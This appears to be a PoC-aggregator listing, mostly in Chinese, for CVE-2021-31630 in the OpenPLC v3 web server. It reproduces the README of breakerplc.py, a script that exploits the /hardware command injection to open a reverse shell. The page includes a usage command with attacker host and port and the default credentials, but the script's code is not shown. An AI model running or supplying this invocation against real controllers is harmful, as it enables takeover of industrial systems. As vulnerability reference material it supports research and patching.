关联漏洞
标题:
OpenPLC 代码注入漏洞
(CVE-2021-31630)
描述:OpenPLC是一种开源的可编程逻辑控制器。可为自动化和研究提供低成本的工业解决方案。 OpenPLC v3 存在代码注入漏洞,该漏洞源于产品的web服务中 /hardware 页面的Hardware Layer Code Box组件未能过滤输入的特殊字符。攻击者可通过该漏洞执行系统命令。
描述
This is a automation of cve-2021-31630 exploitation
介绍
This script automatically exploits vulnerability in OpenPLC Web Server v3
You will be able to create an automatic Rever Shell with the server without having to use manual techniques.
CVE-2021-31630 Detail
Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application.
*The script was customized so that after completing the script registration in OpenPLC, it generates the machine's shell in the same terminal.*
Use the command below (We recommend creating a Python virtual environment to install as dependencies) # However, the breakerplc.py script must be executed outside the virtual environment.
```
sudo apt update
pip3 install requests
```
How to use? you can use these command line (Below).
```
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc
```
```
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Target URL with http(s)://
options:
-h, --help show this help message and exit
-u U Username
-p P Password
-t T Request Timeout, increase if server is slow
-lh LH LHOST
-lp LP LPORT
```
**IMPORTANT**
After connecting, you need to write "whoami" or "ls" to break the line of code and return the shell.
文件快照
[4.0K] /data/pocs/529ed0423b109c168532b4894ab8e730b68d71fb
├── [7.0K] breakerplc.py
└── [1.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。